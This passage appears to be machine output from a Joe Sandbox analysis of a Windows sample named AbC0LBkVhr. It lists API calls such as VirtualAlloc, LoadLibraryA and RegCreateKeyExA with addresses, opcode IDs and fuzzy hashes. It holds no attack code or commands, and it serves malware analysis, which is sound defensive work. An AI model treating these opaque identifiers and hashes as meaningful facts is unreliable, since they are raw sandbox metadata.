                                                          • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CursorLoad
                                                          • String ID:
                                                          • API String ID: 3238433803-0
                                                          • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                          • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                          • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                          • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLibraryLoadMode
                                                          • String ID:
                                                          • API String ID: 2987862817-0
                                                          • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                          • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                          • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                          • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                          APIs
                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                          • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ClassInfo
                                                          • String ID:
                                                          • API String ID: 3534257612-0
                                                          • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                          • Instruction ID: 6cd5cb93a67b39dfae17eda9b7884797c0ece5161c54fd1178b0752c2523ee83
                                                          • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                          • Instruction Fuzzy Hash: C7E01AB26015146EE710DFA89D81EE73BDCDB08350B2201B7FE08CB246D3A4DD008BA8
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                          • Instruction ID: 7f4ce0808efc90522886b7fd4f7afe0cb5ca5dcd319eb65f5abb6fc959a7204b
                                                          • Opcode Fuzzy Hash: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                          • Instruction Fuzzy Hash: BDE012A93542005FE700FA7589C1F2B22DCDB44315F00846AF945CA183D678CC054B69
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocLock
                                                          • String ID:
                                                          • API String ID: 15508794-0
                                                          • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                          • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                          • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                          • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFree
                                                          • String ID:
                                                          • API String ID: 2087232378-0
                                                          • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                          • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                          • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                          • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                            • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                          • String ID:
                                                          • API String ID: 1658689577-0
                                                          • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                          • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                          • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                          • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                          APIs
                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoScroll
                                                          • String ID:
                                                          • API String ID: 629608716-0
                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                          • Instruction ID: d0a12eb0c5d8f31e5c98d8a2781f1eb62c39d12b06d2a108fd5dac4500059ce8
                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                          • Instruction Fuzzy Hash: C02130B16087466FC340DF39C5447A6BBE4BB88304F04893EA498C3741E778E996CBD6
                                                          APIs
                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                            • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                            • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                          • String ID:
                                                          • API String ID: 390483697-0
                                                          • Opcode ID: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                          • Instruction ID: 435c92a82c98609a262d66890dafa743f24e5c1e823ccadb8e8beb41f7667319
                                                          • Opcode Fuzzy Hash: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                          • Instruction Fuzzy Hash: 95F059B1288300BFE7049BF2ECA6B2577E9E318720F510477F904821C0E5B95800C51E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                          • Instruction ID: bbd698397dbc8f39e4f55c310c3945233451addb9156919cc96357002ab2f652
                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                          • Instruction Fuzzy Hash: 66F06271614109DBBB1CCF58D1519AF7BA0EB44310B20406FF907C7BA0E6346E90DA58
                                                          APIs
                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                          • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                          • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                          • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                          • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                          • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                          • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                          • Instruction ID: 6c88cd9b3502ecc0d8ec22600fa2d9d68314b02b8b7bc0d4dcd5a0b3e687a907
                                                          • Opcode Fuzzy Hash: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                          • Instruction Fuzzy Hash: 62E0E570300304BFDB01EB62AC82A5EBFECDB45704BA14876B400A7242D5785E008418
                                                          APIs
                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage
                                                          • String ID:
                                                          • API String ID: 1306739567-0
                                                          • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                          • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                          • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                          • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                          APIs
                                                          • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF93
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExtentPointText
                                                          • String ID:
                                                          • API String ID: 566491939-0
                                                          • Opcode ID: 3c55dac69961fee89b68075ba878e24778629f7632fcdab2122717d20327b8c8
                                                          • Instruction ID: 35d5fbc2abb1c5525ca41b455db2da1d0f195ed39a7f49d2ce332ec9d6dfc1ac
                                                          • Opcode Fuzzy Hash: 3c55dac69961fee89b68075ba878e24778629f7632fcdab2122717d20327b8c8
                                                          • Instruction Fuzzy Hash: EEE04FB53096102AD600A67E1DC19DB76DC8E483693148176B458E7292D628DE1242AE
                                                          APIs
                                                          • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                          • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                          • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                          • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                          • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                          • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                          APIs
                                                          • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                          • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
